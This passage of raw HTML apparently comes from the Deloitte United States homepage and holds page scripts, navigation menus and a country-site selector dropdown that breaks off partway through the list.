([0-9]{1,}[.0-9]{0,})")).exec(navigator.userAgent)[1]):-1); document.write("<span id='browserVersionNumber'>" + versionNumber + "</span>"); //--> </script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/eventDisplayTime.js" type="text/javascript"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/custom-form-elements.js" type="text/javascript"></script> </head> <body> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/s_code.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/printFormatScript.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/dcom/pageActions.js"></script> <script language="javascript" src="/portal/jslib/form_state_manager.js"></script> <div class='container' id='utilityPage'> <div id="header"> <a href="https://www.deloitte.com/view/en_US/us/index.htm"><img src="/deloitte-ecm-cm-dpm-web/images/dcom/new_deloitte_logo.gif" alt="Deloitte United States" title="Deloitte United States" name="logo" border="0" id="logo" /></a> <ul id="menuPrimary"> <li > <a href="/view/en_US/us/Services/index.htm">Services</a></li> <li > <a href="/view/en_US/us/Industries/index.htm">Industries</a></li> <li > <a href="/view/en_US/us/Insights/index.htm">Insights</a></li> <li > <a href="/view/en_US/us/Careers/index.htm">Careers</a></li> </ul> <ul id="menuSecondary"> <li > <a href="/view/en_US/us/About/index.htm">About</a></li> <li > <a href="/view/en_US/us/press/index.htm">Press</a></li> <li > <a href="/view/en_US/us/Events-Deloitte/index.htm">Events</a></li> <li > <a href="/view/en_US/us/Alumni/index.htm">Alumni</a></li> <li > <a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a></li> <li class = "lastMenuSecondary" > <a href="/view/en_US/us/Contact-us/index.htm">Contact</a></li> </ul> </div> <div id="breadcrumbs"> <a href='/view/en_GX/global/index.htm' title='Global'>Global</a> > <a href='/view/en_US/us/index.htm' title='United States'>United States</a> </div> <script language="javascript"> s.hier3 = "Global>United States"; s.pageName = "Global >United States"; </script> <div id="languageLinksDiv" > <div id="languageLinks"> </div> </div> <div id="preheader"> <script language="javascript"> function processSiteChange( cbo ){ var siteSelectorObj = document.getElementById("siteSelectorList"); //alert(siteSelectorObj.id) var selectedValue = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; if(selectedValue != '0'){ window.location = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; } } function submitOnEnter (e) { var ENTER_KEY = 13; var code = ""; if (window.event) // IE { code = e.keyCode; } else if (e.which) // Netscape/Firefox/Opera { code = e.which; } if (code == ENTER_KEY) { processSiteChange(); return false; } } </script> <div id="siteSelector"> <p id="siteSelected"> <select id="siteSelectorList" name="siteSelectorList" onkeypress="return submitOnEnter(event);" > <option value='0' selected >Global site selector</option> <option value='https://www.deloitte.com/view/en_GX/global/index.htm'>Global</option> <option value='https://www.deloitte.com/view/en_AL/al/index.htm'>Albania</option> <option value='https://www.deloitte.com/view/es_AR/ar/index.htm'>Argentina</option> <option value='https://www.deloitte.com/view/en_AU/au/index.htm'>Australia</option> <option value='https://www.deloitte.com/view/de_AT/at/index.htm'>Austria</option> <option value='https://www.deloitte.com/view/en_AZ/az/index.htm'>Azerbaijan</option> <option value='https://www.deloitte.com/view/en_BS/bs/index.htm'>Bahamas</option> <option value='https://www.deloitte.com/view/en_BH/bh/index.htm'>Bahrain</option> <option value='https://www.deloitte.com/view/en_BB/bb/index.htm'>Barbados</option> <option value='https://www.deloitte.com/view/ru_BY/by/index.htm'>Belarus</option> <option value='https://www.deloitte.com/view/en_BE/be/index.htm'>Belgium</option> <option value='https://www.deloitte.com/view/en_BM/bm/index.htm'>Bermuda</option> <option value='https://www.deloitte.com/view/en_BA/ba/index.htm'>Bosnia and Herzegovina</option> <option value='https://www.deloitte.com/view/pt_BR/br/index.htm'>Brazil</option> <option value='https://www.deloitte.com/view/en_VG/vg/index.htm'>British Virgin Islands</option> <option value='https://www.deloitte.com/view/en_BN/bn/index.htm'>Brunei Darussalam</option> <option value='https://www.deloitte.com/view/bg_BG/bg/index.htm'>Bulgaria</option> <option value='https://www.deloitte.com/view/en_CA/ca/index.htm'>Canada</option> <option value='https://www.deloitte.com/view/en_KY/ky/index.htm'>Cayman Islands</option> <option value='https://www.deloitte.com/view/en_XB/xb/index.htm'>Channel Islands and Isle of Man</option> <option value='https://www.deloitte.com/view/es_CL/cl/index.htm'>Chile</option> <option value='https://www.deloitte.com/view/zh_CN/cn/index.htm'>China</option> <option value='https://www.deloitte.com/view/es_CO/co/index.htm'>Colombia</option> <option value='https://www.deloitte.com/view/es_CR/cr/index.htm'>Costa Rica</option> <option value='https://www.deloitte.com/view/hr_HR/hr/index.htm'>Croatia</option> <option value='https://www.deloitte.com/view/en_CY/cy/index.htm'>Cyprus</option> <option value='https://www.deloitte.com/view/cs_CZ/cz/index.htm'>Czech Republic</option> <option value='https://www.deloitte.com/view/da_DK/dk/index.htm'>Denmark</option> <option value='https://www.deloitte.com/view/es_DO/do/index.htm'>Dominican Republic</option> <option value='https://www.deloitte.com/view/en_AN/an/index.htm'>Dutch Caribbean</option> <option value='https://www.deloitte.com/view/es_EC/ec/index.htm'>Ecuador</option> <option value='https://www.deloitte.com/view/en_EG/eg/index.htm'>Egypt</option> <option value='https://www.deloitte.com/view/es_SV/sv/index.htm'>El Salvador</option> <option value='https://www.deloitte.com/view/et_EE/ee/index.htm'>Estonia</option> <option value='https://www.deloitte.com/view/fi_FI/fi/index.htm'>Finland</option> <option value='https://www.deloitte.com/view/fr_FR/fr/index.htm'>France</option> <option value='https://www.deloitte.com/view/en_MK/mk/index.htm'>FYR Macedonia</option> <option value='https://www.deloitte.com/view/en_GE/ge/index.htm'>Georgia</option> <option value='https://www.deloitte.com/view/de_DE/de/index.htm'>Germany</option> <option value='https://www.deloitte.com/view/en_GR/gr/index.htm'>Greece</option> <option value='https://www.deloitte.com/view/en_GU/gu/index.htm'>Guam</option> <option value='https://www.deloitte.com/view/es_GT/gt/index.htm'>Guatemala</option> <option value='https://www.deloitte.com/view/es_HN/hn/index.htm'>Honduras</option> <option value='/cn'>Hong Kong SAR</option> <option value='https://www.deloitte.com/view/hu_HU/hu/index.htm'>Hungary</option> <option value='https://www.deloitte.com/view/is_IS/is/index.htm'>Iceland</option> <option value='https://www.deloitte.com/view/en_IN/in/index.htm'>India</option> <option value='https://www.deloitte.com/view/en_ID/id/index.htm'>Indonesia</option> <option value='https://www.deloitte.com/view/en_IE/ie/index.htm'>Ireland</option> <option value='https://www.deloitte.com/view/en_XD/xd/index.htm'>Islamic Finance</option> <option value='/xb'>Isle of Man and Channel Islands</option> <option value='https://www.deloitte.com/view/en_IL/il/index.htm'>Israel</option> <option value='https://www.deloitte.com/view/it_IT/it/index.htm'>Italy</option> <option value='https://www.deloitte.com/view/en_JM/jm/index.htm'>Jamaica</option> <option value='https://www.tohmatsu.com/view/ja_JP/jp/index.htm'>Japan</option> <option value='https://www.deloitte.com/view/en_JO/jo/index.htm'>Jordan</option> <option value='https://www.deloitte.com/view/en_KZ/kz/index.htm'>Kazakhstan</option> <option value='https://www.deloitte.com/view/en_KE/ke/index.htm'>Kenya</option> <option value='https://www.deloitte.com/view/ko_KR/kr/index.htm'>Korea</option> <option value='https://www.deloitte.com/view/en_KW/kw/index.h..